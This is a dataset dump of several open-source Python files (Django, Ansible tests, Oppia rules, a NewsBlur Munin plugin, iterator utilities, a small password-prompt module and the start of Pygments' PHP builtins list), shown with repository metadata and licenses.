repo_name (stringlengths 6-100) | path (stringlengths 4-294) | copies (stringlengths 1-5) | size (stringlengths 4-6) | content (stringlengths 606-896k) | license (stringclasses, 15 values)
---|---|---|---|---|---
rooshilp/CMPUT410W15-project
|
testenv/lib/python2.7/site-packages/django/db/models/related.py
|
62
|
3102
|
from collections import namedtuple
from django.utils.encoding import smart_text
from django.db.models.fields import BLANK_CHOICE_DASH
# PathInfo is used when converting lookups (fk__somecol). The contents
# describe the relation in Model terms (model Options and Fields for both
# sides of the relation). The join_field is the field backing the relation.
PathInfo = namedtuple('PathInfo',
'from_opts to_opts target_fields join_field '
'm2m direct')
class RelatedObject(object):
def __init__(self, parent_model, model, field):
self.parent_model = parent_model
self.model = model
self.opts = model._meta
self.field = field
self.name = '%s:%s' % (self.opts.app_label, self.opts.model_name)
self.var_name = self.opts.model_name
def get_choices(self, include_blank=True, blank_choice=BLANK_CHOICE_DASH,
limit_to_currently_related=False):
"""Returns choices with a default blank choices included, for use
as SelectField choices for this field.
Analogue of django.db.models.fields.Field.get_choices, provided
initially for utilization by RelatedFieldListFilter.
"""
first_choice = blank_choice if include_blank else []
queryset = self.model._default_manager.all()
if limit_to_currently_related:
queryset = queryset.complex_filter(
{'%s__isnull' % self.parent_model._meta.model_name: False})
lst = [(x._get_pk_val(), smart_text(x)) for x in queryset]
return first_choice + lst
def get_db_prep_lookup(self, lookup_type, value, connection, prepared=False):
# Defer to the actual field definition for db prep
return self.field.get_db_prep_lookup(lookup_type, value,
connection=connection, prepared=prepared)
def editable_fields(self):
"Get the fields in this class that should be edited inline."
return [f for f in self.opts.fields + self.opts.many_to_many if f.editable and f != self.field]
def __repr__(self):
return "<RelatedObject: %s related to %s>" % (self.name, self.field.name)
def get_accessor_name(self):
# This method encapsulates the logic that decides what name to give an
# accessor descriptor that retrieves related many-to-one or
# many-to-many objects. It uses the lower-cased object_name + "_set",
# but this can be overridden with the "related_name" option.
if self.field.rel.multiple:
# If this is a symmetrical m2m relation on self, there is no reverse accessor.
if getattr(self.field.rel, 'symmetrical', False) and self.model == self.parent_model:
return None
return self.field.rel.related_name or (self.opts.model_name + '_set')
else:
return self.field.rel.related_name or (self.opts.model_name)
def get_cache_name(self):
return "_%s_cache" % self.get_accessor_name()
def get_path_info(self):
return self.field.get_reverse_path_info()
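# A brief usage sketch (hypothetical Author/Book models; 1.6-era Django API
# assumed): a RelatedObject backs the reverse side of a relation, and
# get_accessor_name() decides the name used for reverse lookups.
#
#   class Author(models.Model):
#       name = models.CharField(max_length=100)
#
#   class Book(models.Model):
#       author = models.ForeignKey(Author)
#
#   rel = Book._meta.get_field('author').related  # a RelatedObject
#   rel.get_accessor_name()  # 'book_set' (no related_name was given)
#   rel.get_cache_name()     # '_book_set_cache'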
|
gpl-2.0
|
Jason-Gew/Python_modules
|
authenticate.py
|
1
|
2754
|
#!/usr/bin/env python
#
# authenticate.py module is created by Jason/Ge Wu
# Purpose: to quickly set up and verify a username & password
# for system or software access.
from getpass import getpass # Disable password display on console
import base64 # Note: base64 is an encoding, not encryption; for real protection use a hash (e.g. SHA-256) or a cipher such as AES
encryp_pass = ""
def set_authentication(pass_length, set_timeout):
global encryp_pass
while set_timeout > 0:
select1 = raw_input("\nWould you like to setup a new Password for Login? (Y/n): ")
if select1 == 'Y' or select1 == 'y':
while set_timeout > 0:
buff1 = getpass(prompt = "\nPlease Enter your Password: ")
if not buff1.isspace():
buff2 = getpass(prompt = "Please Enter your Password again: ")
if buff1 == buff2:
if len(buff2) < pass_length:
print "-> Password must have {} characters or more!".format(pass_length)
set_timeout -= 1
print "-> You have {} chance(s)...".format(set_timeout)
continue
else:
encryp_pass = base64.b64encode(buff2)
print "\n ==== Password Setup Success ====\n"
del buff1, buff2
return True
else:
print "-> Password does not match! Please Try Again!\n"
set_timeout -= 1
print "-> You have {} chance(s)...".format(set_timeout)
continue
else:
print "-> Invalid Password!\n"
set_timeout -= 1
print "-> You have {} chance(s)...".format(set_timeout)
continue
elif select1 == 'N' or select1 == 'n':
return False
else:
if set_timeout > 0:
print "-> Please enter \'Y\' or \'n\' character only!"
set_timeout -= 1
print "-> You have {} chance(s)...".format(set_timeout)
else:
print "\nTime Out, please re-run the program and Try Carefully!\n"
exit(1)
def console_authenticate(set_timeout):
while set_timeout > 0:
buff = getpass(prompt = "\nPlease enter your Password: ")
encryp_buffer = base64.b64encode(buff)
if encryp_buffer == encryp_pass:
print "\n ==== Authentication Success ==== \n"
del buff, encryp_buffer
return True
elif buff == '':
print "-> Password cannot be empty!\n"
set_timeout -= 1
print "-> You have {} chance(s)...".format(set_timeout)
else:
set_timeout -= 1
if set_timeout > 0:
print "-> Invalid Password, Please Try Again!"
print "-> You still have {} chance(s)...".format(set_timeout)
else:
print "\n ==== Authentication Fail ==== \n"
return False
# For testing purpose...
if __name__ == "__main__":
if set_authentication(6,4):
if console_authenticate(3):
print "Done"
else:
print "Failed"
exit(1)
else:
print "No Authentication!"
exit(0)
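# Side note (illustrative, not part of the original module): base64 is a
# reversible encoding, not encryption. A minimal sketch of the same check
# built on a salted SHA-256 digest from the standard library instead:
#
#   import hashlib, os
#
#   def hash_password(password, salt=None):
#       salt = salt if salt is not None else os.urandom(16)
#       return salt, hashlib.sha256(salt + password).hexdigest()
#
#   salt, stored = hash_password("s3cret!")
#   assert hash_password("s3cret!", salt)[1] == stored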
|
gpl-3.0
|
jrief/django-shop
|
shop/admin/defaults/customer.py
|
3
|
1832
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from django.utils.html import format_html_join
from django.utils.translation import ugettext_lazy as _
from shop.admin.customer import CustomerProxy, CustomerInlineAdminBase, CustomerAdminBase
class CustomerInlineAdmin(CustomerInlineAdminBase):
fieldsets = (
(None, {'fields': ('get_number', 'salutation')}),
(_("Addresses"), {'fields': ('get_shipping_addresses', 'get_billing_addresses')})
)
readonly_fields = ('get_number', 'get_shipping_addresses', 'get_billing_addresses')
def get_number(self, customer):
return customer.get_number() or '–'
get_number.short_description = _("Customer Number")
def get_shipping_addresses(self, customer):
addresses = [(a.as_text(),) for a in customer.shippingaddress_set.all()]
return format_html_join('', '<address>{0}</address>', addresses)
get_shipping_addresses.short_description = _("Shipping")
def get_billing_addresses(self, customer):
addresses = [(a.as_text(),) for a in customer.billingaddress_set.all()]
return format_html_join('', '<address>{0}</address>', addresses)
get_billing_addresses.short_description = _("Billing")
@admin.register(CustomerProxy)
class CustomerAdmin(CustomerAdminBase):
inlines = (CustomerInlineAdmin,)
def get_list_display(self, request):
list_display = list(super(CustomerAdmin, self).get_list_display(request))
list_display.insert(1, 'salutation')
return list_display
def salutation(self, user):
if hasattr(user, 'customer'):
return user.customer.get_salutation_display()
return ''
salutation.short_description = _("Salutation")
salutation.admin_order_field = 'customer__salutation'
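# A small illustration (hypothetical data) of the format_html_join() call used
# above: each argument tuple is escaped, rendered through the format string,
# and the fragments are joined with the separator:
#
#   format_html_join('', '<address>{0}</address>',
#                    [('12 Main St',), ('34 Side Rd <b>',)])
#   # -> '<address>12 Main St</address><address>34 Side Rd &lt;b&gt;</address>'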
|
bsd-3-clause
|
vinayan3/clpricehistory
|
django/contrib/gis/geos/linestring.py
|
411
|
5568
|
from django.contrib.gis.geos.base import numpy
from django.contrib.gis.geos.coordseq import GEOSCoordSeq
from django.contrib.gis.geos.error import GEOSException
from django.contrib.gis.geos.geometry import GEOSGeometry
from django.contrib.gis.geos.point import Point
from django.contrib.gis.geos import prototypes as capi
class LineString(GEOSGeometry):
_init_func = capi.create_linestring
_minlength = 2
#### Python 'magic' routines ####
def __init__(self, *args, **kwargs):
"""
Initializes on the given sequence -- may take lists, tuples, NumPy arrays
of X,Y pairs, or Point objects. If Point objects are used, ownership is
_not_ transferred to the LineString object.
Examples:
ls = LineString((1, 1), (2, 2))
ls = LineString([(1, 1), (2, 2)])
ls = LineString(array([(1, 1), (2, 2)]))
ls = LineString(Point(1, 1), Point(2, 2))
"""
# If only one argument provided, set the coords array appropriately
if len(args) == 1: coords = args[0]
else: coords = args
if isinstance(coords, (tuple, list)):
# Getting the number of coords and the number of dimensions -- which
# must stay the same, e.g., no LineString((1, 2), (1, 2, 3)).
ncoords = len(coords)
if coords: ndim = len(coords[0])
else: raise TypeError('Cannot initialize on empty sequence.')
self._checkdim(ndim)
# Incrementing through each of the coordinates and verifying
for i in xrange(1, ncoords):
if not isinstance(coords[i], (tuple, list, Point)):
raise TypeError('each coordinate should be a sequence (list or tuple)')
if len(coords[i]) != ndim: raise TypeError('Dimension mismatch.')
numpy_coords = False
elif numpy and isinstance(coords, numpy.ndarray):
shape = coords.shape # Using numpy's shape.
if len(shape) != 2: raise TypeError('Too many dimensions.')
self._checkdim(shape[1])
ncoords = shape[0]
ndim = shape[1]
numpy_coords = True
else:
raise TypeError('Invalid initialization input for LineStrings.')
# Creating a coordinate sequence object because it is easier to
# set the points using GEOSCoordSeq.__setitem__().
cs = GEOSCoordSeq(capi.create_cs(ncoords, ndim), z=bool(ndim==3))
for i in xrange(ncoords):
if numpy_coords: cs[i] = coords[i,:]
elif isinstance(coords[i], Point): cs[i] = coords[i].tuple
else: cs[i] = coords[i]
# If SRID was passed in with the keyword arguments
srid = kwargs.get('srid', None)
# Calling the base geometry initialization with the returned pointer
# from the function.
super(LineString, self).__init__(self._init_func(cs.ptr), srid=srid)
def __iter__(self):
"Allows iteration over this LineString."
for i in xrange(len(self)):
yield self[i]
def __len__(self):
"Returns the number of points in this LineString."
return len(self._cs)
def _get_single_external(self, index):
return self._cs[index]
_get_single_internal = _get_single_external
def _set_list(self, length, items):
ndim = self._cs.dims #
hasz = self._cs.hasz # I don't understand why these are different
# create a new coordinate sequence and populate accordingly
cs = GEOSCoordSeq(capi.create_cs(length, ndim), z=hasz)
for i, c in enumerate(items):
cs[i] = c
ptr = self._init_func(cs.ptr)
if ptr:
capi.destroy_geom(self.ptr)
self.ptr = ptr
self._post_init(self.srid)
else:
# can this happen?
raise GEOSException('Geometry resulting from slice deletion was invalid.')
def _set_single(self, index, value):
self._checkindex(index)
self._cs[index] = value
def _checkdim(self, dim):
if dim not in (2, 3): raise TypeError('Dimension mismatch.')
#### Sequence Properties ####
@property
def tuple(self):
"Returns a tuple version of the geometry from the coordinate sequence."
return self._cs.tuple
coords = tuple
def _listarr(self, func):
"""
Internal routine that returns a sequence (list) corresponding with
the given function. Will return a numpy array if possible.
"""
lst = [func(i) for i in xrange(len(self))]
if numpy: return numpy.array(lst) # ARRRR!
else: return lst
@property
def array(self):
"Returns a numpy array for the LineString."
return self._listarr(self._cs.__getitem__)
@property
def merged(self):
"Returns the line merge of this LineString."
return self._topology(capi.geos_linemerge(self.ptr))
@property
def x(self):
"Returns a list or numpy array of the X variable."
return self._listarr(self._cs.getX)
@property
def y(self):
"Returns a list or numpy array of the Y variable."
return self._listarr(self._cs.getY)
@property
def z(self):
"Returns a list or numpy array of the Z variable."
if not self.hasz: return None
else: return self._listarr(self._cs.getZ)
# LinearRings are LineStrings used within Polygons.
class LinearRing(LineString):
_minlength = 4
_init_func = capi.create_linearring
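# A minimal usage sketch (GEOS must be available at runtime), echoing the
# constructor docstring above:
#
#   ls = LineString((0, 0), (1, 1), (2, 0))
#   len(ls)   # 3 -- number of points, via __len__
#   ls.tuple  # ((0.0, 0.0), (1.0, 1.0), (2.0, 0.0))
#   ls.x      # [0.0, 1.0, 2.0] as a list, or a numpy array if numpy exists
#   ls[1]     # (1.0, 1.0)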
|
bsd-3-clause
|
brandond/ansible
|
test/units/plugins/connection/test_psrp.py
|
40
|
4802
|
# -*- coding: utf-8 -*-
# (c) 2018, Jordan Borean <jborean@redhat.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
from io import StringIO
from ansible.playbook.play_context import PlayContext
from ansible.plugins.loader import connection_loader
pytest.importorskip("pypsrp")
class TestConnectionWinRM(object):
OPTIONS_DATA = (
# default options
(
{'_extras': {}},
{
'_psrp_auth': 'negotiate',
'_psrp_cert_validation': True,
'_psrp_configuration_name': 'Microsoft.PowerShell',
'_psrp_connection_timeout': 30,
'_psrp_message_encryption': 'auto',
'_psrp_host': 'inventory_hostname',
'_psrp_conn_kwargs': {
'server': 'inventory_hostname',
'port': 5986,
'username': None,
'password': '',
'ssl': True,
'path': 'wsman',
'auth': 'negotiate',
'cert_validation': True,
'connection_timeout': 30,
'encryption': 'auto',
'proxy': None,
'no_proxy': False,
'max_envelope_size': 153600,
'operation_timeout': 20,
},
'_psrp_max_envelope_size': 153600,
'_psrp_ignore_proxy': False,
'_psrp_operation_timeout': 20,
'_psrp_pass': '',
'_psrp_path': 'wsman',
'_psrp_port': 5986,
'_psrp_proxy': None,
'_psrp_protocol': 'https',
'_psrp_user': None
},
),
# ssl=False when port defined to 5985
(
{'_extras': {}, 'ansible_port': '5985'},
{
'_psrp_port': 5985,
'_psrp_protocol': 'http'
},
),
# ssl=True when port defined to not 5985
(
{'_extras': {}, 'ansible_port': 1234},
{
'_psrp_port': 1234,
'_psrp_protocol': 'https'
},
),
# port 5986 when ssl=True
(
{'_extras': {}, 'ansible_psrp_protocol': 'https'},
{
'_psrp_port': 5986,
'_psrp_protocol': 'https'
},
),
# port 5985 when ssl=False
(
{'_extras': {}, 'ansible_psrp_protocol': 'http'},
{
'_psrp_port': 5985,
'_psrp_protocol': 'http'
},
),
# psrp extras
(
{'_extras': {'ansible_psrp_negotiate_delegate': True}},
{
'_psrp_conn_kwargs': {
'server': 'inventory_hostname',
'port': 5986,
'username': None,
'password': '',
'ssl': True,
'path': 'wsman',
'auth': 'negotiate',
'cert_validation': True,
'connection_timeout': 30,
'encryption': 'auto',
'proxy': None,
'no_proxy': False,
'max_envelope_size': 153600,
'operation_timeout': 20,
'negotiate_delegate': True,
},
},
),
# cert validation through string repr of bool
(
{'_extras': {}, 'ansible_psrp_cert_validation': 'ignore'},
{
'_psrp_cert_validation': False
},
),
# cert validation path
(
{'_extras': {}, 'ansible_psrp_cert_trust_path': '/path/cert.pem'},
{
'_psrp_cert_validation': '/path/cert.pem'
},
),
)
# pylint bug: https://github.com/PyCQA/pylint/issues/511
# pylint: disable=undefined-variable
@pytest.mark.parametrize('options, expected',
((o, e) for o, e in OPTIONS_DATA))
def test_set_options(self, options, expected):
pc = PlayContext()
new_stdin = StringIO()
conn = connection_loader.get('psrp', pc, new_stdin)
conn.set_options(var_options=options)
conn._build_kwargs()
for attr, expected in expected.items():
actual = getattr(conn, attr)
assert actual == expected, \
"psrp attr '%s', actual '%s' != expected '%s'"\
% (attr, actual, expected)
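# For reference, the port/protocol defaulting exercised by the cases above can
# be summarized in plain Python (reconstructed from the expected values, not
# taken from the plugin source):
#
#   def infer_psrp_endpoint(port=None, protocol=None):
#       if protocol is None:
#           protocol = 'http' if port == 5985 else 'https'
#       if port is None:
#           port = 5986 if protocol == 'https' else 5985
#       return port, protocol
#
#   assert infer_psrp_endpoint() == (5986, 'https')
#   assert infer_psrp_endpoint(port=5985) == (5985, 'http')
#   assert infer_psrp_endpoint(protocol='http') == (5985, 'http')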
|
gpl-3.0
|
miyucy/oppia
|
extensions/rules/set_of_unicode_string.py
|
20
|
2309
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rules for SetOfUnicodeString objects."""
__author__ = 'Sean Lip'
from extensions.rules import base
class Equals(base.SetOfUnicodeStringRule):
description = 'is equal to {{x|SetOfUnicodeString}}'
is_generic = False
def _evaluate(self, subject):
return set(subject) == set(self.x)
class IsSubsetOf(base.SetOfUnicodeStringRule):
description = 'is a proper subset of {{x|SetOfUnicodeString}}'
is_generic = False
def _evaluate(self, subject):
return set(subject) < set(self.x)
class IsSupersetOf(base.SetOfUnicodeStringRule):
description = 'is a proper superset of {{x|SetOfUnicodeString}}'
is_generic = True
def _evaluate(self, subject):
return set(subject) > set(self.x)
class HasElementsIn(base.SetOfUnicodeStringRule):
description = 'has elements in common with {{x|SetOfUnicodeString}}'
is_generic = True
def _evaluate(self, subject):
return bool(set(subject).intersection(set(self.x)))
class HasElementsNotIn(base.SetOfUnicodeStringRule):
description = 'has elements not in {{x|SetOfUnicodeString}}'
is_generic = True
def _evaluate(self, subject):
return bool(set(subject) - set(self.x))
class OmitsElementsIn(base.SetOfUnicodeStringRule):
description = 'omits some elements of {{x|SetOfUnicodeString}}'
is_generic = False
def _evaluate(self, subject):
return bool(set(self.x) - set(subject))
class IsDisjointFrom(base.SetOfUnicodeStringRule):
description = 'has no elements in common with {{x|SetOfUnicodeString}}'
is_generic = True
def _evaluate(self, subject):
return not bool(set(subject).intersection(set(self.x)))
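# These rules map directly onto Python set operators; a quick sketch with
# hypothetical subject/x values:
#
#   subject, x = {'a', 'b'}, {'a', 'b', 'c'}
#   set(subject) < set(x)             # IsSubsetOf: proper subset -> True
#   set(x) - set(subject)             # OmitsElementsIn: {'c'}, so truthy
#   set(subject).intersection({'z'})  # empty, so IsDisjointFrom -> True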
|
apache-2.0
|
dosiecki/NewsBlur
|
utils/munin/newsblur_tasks_pipeline.py
|
4
|
1488
|
#!/srv/newsblur/venv/newsblur/bin/python
from utils.munin.base import MuninGraph
class NBMuninGraph(MuninGraph):
@property
def graph_config(self):
graph = {
'graph_category' : 'NewsBlur',
'graph_title' : 'NewsBlur Task Pipeline',
'graph_vlabel' : 'Feed fetch pipeline times',
'graph_args' : '-l 0',
'feed_fetch.label': 'feed_fetch',
'feed_process.label': 'feed_process',
'page.label': 'page',
'icon.label': 'icon',
'total.label': 'total',
}
return graph
def calculate_metrics(self):
return self.stats
@property
def stats(self):
import datetime
from django.conf import settings
stats = settings.MONGOANALYTICSDB.nbanalytics.feed_fetches.aggregate([{
"$match": {
"date": {
"$gt": datetime.datetime.now() - datetime.timedelta(minutes=5),
},
},
}, {
"$group": {
"_id": 1,
"feed_fetch": {"$avg": "$feed_fetch"},
"feed_process": {"$avg": "$feed_process"},
"page": {"$avg": "$page"},
"icon": {"$avg": "$icon"},
"total": {"$avg": "$total"},
},
}])
return list(stats)[0]
if __name__ == '__main__':
NBMuninGraph().run()
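# Shape of the value calculate_metrics() returns, per the $group stage above
# (numbers are illustrative):
#
#   {'_id': 1, 'feed_fetch': 1.2, 'feed_process': 0.8,
#    'page': 0.4, 'icon': 0.1, 'total': 2.5}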
|
mit
|
siosio/intellij-community
|
python/helpers/pockets/iterators.py
|
30
|
8342
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016 the Pockets team, see AUTHORS.
# Licensed under the BSD License, see LICENSE for details.
"""A pocket full of useful iterators!"""
from __future__ import absolute_import
import collections
import six
__all__ = ["peek_iter", "modify_iter"]
class peek_iter(object):
"""An iterator object that supports peeking ahead.
>>> p = peek_iter(["a", "b", "c", "d", "e"])
>>> p.peek()
'a'
>>> p.next()
'a'
>>> p.peek(3)
['b', 'c', 'd']
Args:
o (iterable or callable): `o` is interpreted very differently
depending on the presence of `sentinel`.
If `sentinel` is not given, then `o` must be a collection object
which supports either the iteration protocol or the sequence
protocol.
If `sentinel` is given, then `o` must be a callable object.
sentinel (any value, optional): If given, the iterator will call `o`
with no arguments for each call to its `next` method; if the value
returned is equal to `sentinel`, :exc:`StopIteration` will be
raised, otherwise the value will be returned.
See Also:
`peek_iter` can operate as a drop-in replacement for the built-in
`iter <http://docs.python.org/2/library/functions.html#iter>`_
function.
Attributes:
sentinel (any value): The value used to indicate the iterator is
exhausted. If `sentinel` was not given when the `peek_iter` was
instantiated, then it will be set to a new object
instance: ``object()``.
"""
def __init__(self, *args):
"""__init__(o, sentinel=None)"""
self._iterable = iter(*args)
self._cache = collections.deque()
self.sentinel = args[1] if len(args) > 1 else object()
def __iter__(self):
return self
def __next__(self, n=None):
# NOTE: Prevent 2to3 from transforming self.next() in next(self),
# which causes an infinite loop!
return getattr(self, 'next')(n)
def _fillcache(self, n):
"""Cache `n` items. If `n` is 0 or None, then 1 item is cached."""
if not n:
n = 1
try:
while len(self._cache) < n:
self._cache.append(next(self._iterable))
except StopIteration:
while len(self._cache) < n:
self._cache.append(self.sentinel)
def has_next(self):
"""Determine if iterator is exhausted.
Returns:
bool: True if iterator has more items, False otherwise.
Note:
Will never raise :exc:`StopIteration`.
"""
return self.peek() != self.sentinel
def next(self, n=None):
"""Get the next item or `n` items of the iterator.
Args:
n (int, optional): The number of items to retrieve. Defaults to
None.
Returns:
item or list of items: The next item or `n` items of the iterator.
If `n` is None, the item itself is returned. If `n` is an int,
the items will be returned in a list. If `n` is 0, an empty
list is returned:
>>> p = peek_iter(["a", "b", "c", "d", "e"])
>>> p.next()
'a'
>>> p.next(0)
[]
>>> p.next(1)
['b']
>>> p.next(2)
['c', 'd']
Raises:
StopIteration: Raised if the iterator is exhausted, even if
`n` is 0.
"""
self._fillcache(n)
if not n:
if self._cache[0] == self.sentinel:
raise StopIteration
if n is None:
result = self._cache.popleft()
else:
result = []
else:
if self._cache[n - 1] == self.sentinel:
raise StopIteration
result = [self._cache.popleft() for i in range(n)]
return result
def peek(self, n=None):
"""Preview the next item or `n` items of the iterator.
The iterator is not advanced when peek is called.
Args:
n (int, optional): The number of items to retrieve. Defaults to
None.
Returns:
item or list of items: The next item or `n` items of the iterator.
If `n` is None, the item itself is returned. If `n` is an int,
the items will be returned in a list. If `n` is 0, an empty
list is returned.
If the iterator is exhausted, `peek_iter.sentinel` is returned,
or placed as the last item in the returned list:
>>> p = peek_iter(["a", "b", "c"])
>>> p.sentinel = "END"
>>> p.peek()
'a'
>>> p.peek(0)
[]
>>> p.peek(1)
['a']
>>> p.peek(2)
['a', 'b']
>>> p.peek(4)
['a', 'b', 'c', 'END']
Note:
Will never raise :exc:`StopIteration`.
"""
self._fillcache(n)
if n is None:
result = self._cache[0]
else:
result = [self._cache[i] for i in range(n)]
return result
class modify_iter(peek_iter):
"""An iterator object that supports modifying items as they are returned.
>>> a = [" A list ",
... " of strings ",
... " with ",
... " extra ",
... " whitespace. "]
>>> modifier = lambda s: s.strip().replace('with', 'without')
>>> for s in modify_iter(a, modifier=modifier):
... print('"%s"' % s)
"A list"
"of strings"
"without"
"extra"
"whitespace."
Args:
o (iterable or callable): `o` is interpreted very differently
depending on the presence of `sentinel`.
If `sentinel` is not given, then `o` must be a collection object
which supports either the iteration protocol or the sequence
protocol.
If `sentinel` is given, then `o` must be a callable object.
sentinel (any value, optional): If given, the iterator will call `o`
with no arguments for each call to its `next` method; if the value
returned is equal to `sentinel`, :exc:`StopIteration` will be
raised, otherwise the value will be returned.
modifier (callable, optional): The function that will be used to
modify each item returned by the iterator. `modifier` should take
a single argument and return a single value. Defaults
to ``lambda x: x``.
If `sentinel` is not given, `modifier` must be passed as a keyword
argument.
Attributes:
modifier (callable): `modifier` is called with each item in `o` as it
is iterated. The return value of `modifier` is returned in lieu of
the item.
Values returned by `peek` as well as `next` are affected by
`modifier`. However, `modify_iter.sentinel` is never passed through
`modifier`; it will always be returned from `peek` unmodified.
"""
def __init__(self, *args, **kwargs):
"""__init__(o, sentinel=None, modifier=lambda x: x)"""
if 'modifier' in kwargs:
self.modifier = kwargs['modifier']
elif len(args) > 2:
self.modifier = args[2]
args = args[:2]
else:
self.modifier = lambda x: x
if not six.callable(self.modifier):
raise TypeError('modify_iter(o, modifier): '
'modifier must be callable')
super(modify_iter, self).__init__(*args)
def _fillcache(self, n):
"""Cache `n` modified items. If `n` is 0 or None, 1 item is cached.
Each item returned by the iterator is passed through the
`modify_iter.modifier` function before being cached.
"""
if not n:
n = 1
try:
while len(self._cache) < n:
self._cache.append(self.modifier(next(self._iterable)))
except StopIteration:
while len(self._cache) < n:
self._cache.append(self.sentinel)
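# A short sketch of the two-argument (callable, sentinel) form described in
# the docstrings above, mirroring the built-in iter():
#
#   lines = iter(["alpha", "beta", ""])
#   p = peek_iter(lambda: next(lines), "")
#   p.peek()      # 'alpha'
#   p.next(2)     # ['alpha', 'beta']
#   p.has_next()  # False -- the "" sentinel marks exhaustion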
|
apache-2.0
|
pvthuy/word2vec
|
word2vec/wordclusters.py
|
8
|
1115
|
from __future__ import division, print_function, unicode_literals
import numpy as np
class WordClusters(object):
def __init__(self, vocab, clusters):
self.vocab = vocab
self.clusters = clusters
def ix(self, word):
"""
Returns the index on self.vocab and self.clusters for `word`
"""
temp = np.where(self.vocab == word)[0]
if temp.size == 0:
raise KeyError('Word not in vocabulary')
else:
return temp[0]
def __getitem__(self, word):
return self.get_cluster(word)
def get_cluster(self, word):
"""
Returns the cluster number for a word in the vocabulary
"""
idx = self.ix(word)
return self.clusters[idx]
def get_words_on_cluster(self, cluster):
return self.vocab[self.clusters == cluster]
@classmethod
def from_text(cls, fname):
vocab = np.genfromtxt(fname, dtype=np.object, delimiter=' ', usecols=0)
clusters = np.genfromtxt(fname, dtype=int, delimiter=' ', usecols=1)
return cls(vocab=vocab, clusters=clusters)
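# Minimal usage sketch (hypothetical 'classes.txt' with "word cluster" lines,
# as produced by word2vec's clustering mode):
#
#   clusters = WordClusters.from_text('classes.txt')
#   clusters['dog']                   # cluster number for 'dog'
#   clusters.get_words_on_cluster(7)  # numpy array of words in cluster 7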
|
apache-2.0
|
victoredwardocallaghan/pygments-main
|
pygments/lexers/_phpbuiltins.py
|
10
|
122176
|
# -*- coding: utf-8 -*-
"""
pygments.lexers._phpbuiltins
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This file loads the function names and their modules from the
PHP website and regenerates itself.
Do not alter the MODULES dict by hand!
WARNING: the generation transfers quite a lot of data over your
internet connection. Don't run it at home; use
a server ;-)
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import print_function
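# Illustrative only (not part of the generated file): MODULES maps extension
# names to function lists, so a reverse function-to-module lookup is one
# expression away:
#
#   PHP_FUNC_TO_MODULE = dict(
#       (func, module) for module, funcs in MODULES.items() for func in funcs)
#   PHP_FUNC_TO_MODULE['bcadd']  # 'BC Math'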
MODULES = {'.NET': ['dotnet_load'],
'APC': ['apc_add',
'apc_bin_dump',
'apc_bin_dumpfile',
'apc_bin_load',
'apc_bin_loadfile',
'apc_cache_info',
'apc_cas',
'apc_clear_cache',
'apc_compile_file',
'apc_dec',
'apc_define_constants',
'apc_delete_file',
'apc_delete',
'apc_exists',
'apc_fetch',
'apc_inc',
'apc_load_constants',
'apc_sma_info',
'apc_store'],
'APD': ['apd_breakpoint',
'apd_callstack',
'apd_clunk',
'apd_continue',
'apd_croak',
'apd_dump_function_table',
'apd_dump_persistent_resources',
'apd_dump_regular_resources',
'apd_echo',
'apd_get_active_symbols',
'apd_set_pprof_trace',
'apd_set_session_trace_socket',
'apd_set_session_trace',
'apd_set_session',
'override_function',
'rename_function'],
'Aliases and deprecated Mysqli': ['mysqli_bind_param',
'mysqli_bind_result',
'mysqli_client_encoding',
'mysqli_connect',
'mysqli_disable_reads_from_master',
'mysqli_disable_rpl_parse',
'mysqli_enable_reads_from_master',
'mysqli_enable_rpl_parse',
'mysqli_escape_string',
'mysqli_execute',
'mysqli_fetch',
'mysqli_get_metadata',
'mysqli_master_query',
'mysqli_param_count',
'mysqli_report',
'mysqli_rpl_parse_enabled',
'mysqli_rpl_probe',
'mysqli_rpl_query_type',
'mysqli_send_long_data',
'mysqli_send_query',
'mysqli_set_opt',
'mysqli_slave_query'],
'Apache': ['apache_child_terminate',
'apache_get_modules',
'apache_get_version',
'apache_getenv',
'apache_lookup_uri',
'apache_note',
'apache_request_headers',
'apache_reset_timeout',
'apache_response_headers',
'apache_setenv',
'getallheaders',
'virtual'],
'Array': ['array_change_key_case',
'array_chunk',
'array_combine',
'array_count_values',
'array_diff_assoc',
'array_diff_key',
'array_diff_uassoc',
'array_diff_ukey',
'array_diff',
'array_fill_keys',
'array_fill',
'array_filter',
'array_flip',
'array_intersect_assoc',
'array_intersect_key',
'array_intersect_uassoc',
'array_intersect_ukey',
'array_intersect',
'array_key_exists',
'array_keys',
'array_map',
'array_merge_recursive',
'array_merge',
'array_multisort',
'array_pad',
'array_pop',
'array_product',
'array_push',
'array_rand',
'array_reduce',
'array_replace_recursive',
'array_replace',
'array_reverse',
'array_search',
'array_shift',
'array_slice',
'array_splice',
'array_sum',
'array_udiff_assoc',
'array_udiff_uassoc',
'array_udiff',
'array_uintersect_assoc',
'array_uintersect_uassoc',
'array_uintersect',
'array_unique',
'array_unshift',
'array_values',
'array_walk_recursive',
'array_walk',
'array',
'arsort',
'asort',
'compact',
'count',
'current',
'each',
'end',
'extract',
'in_array',
'key',
'krsort',
'ksort',
'list',
'natcasesort',
'natsort',
'next',
'pos',
'prev',
'range',
'reset',
'rsort',
'shuffle',
'sizeof',
'sort',
'uasort',
'uksort',
'usort'],
'BBCode': ['bbcode_add_element',
'bbcode_add_smiley',
'bbcode_create',
'bbcode_destroy',
'bbcode_parse',
'bbcode_set_arg_parser',
'bbcode_set_flags'],
'BC Math': ['bcadd',
'bccomp',
'bcdiv',
'bcmod',
'bcmul',
'bcpow',
'bcpowmod',
'bcscale',
'bcsqrt',
'bcsub'],
'Bzip2': ['bzclose',
'bzcompress',
'bzdecompress',
'bzerrno',
'bzerror',
'bzerrstr',
'bzflush',
'bzopen',
'bzread',
'bzwrite'],
'COM': ['com_addref',
'com_create_guid',
'com_event_sink',
'com_get_active_object',
'com_get',
'com_invoke',
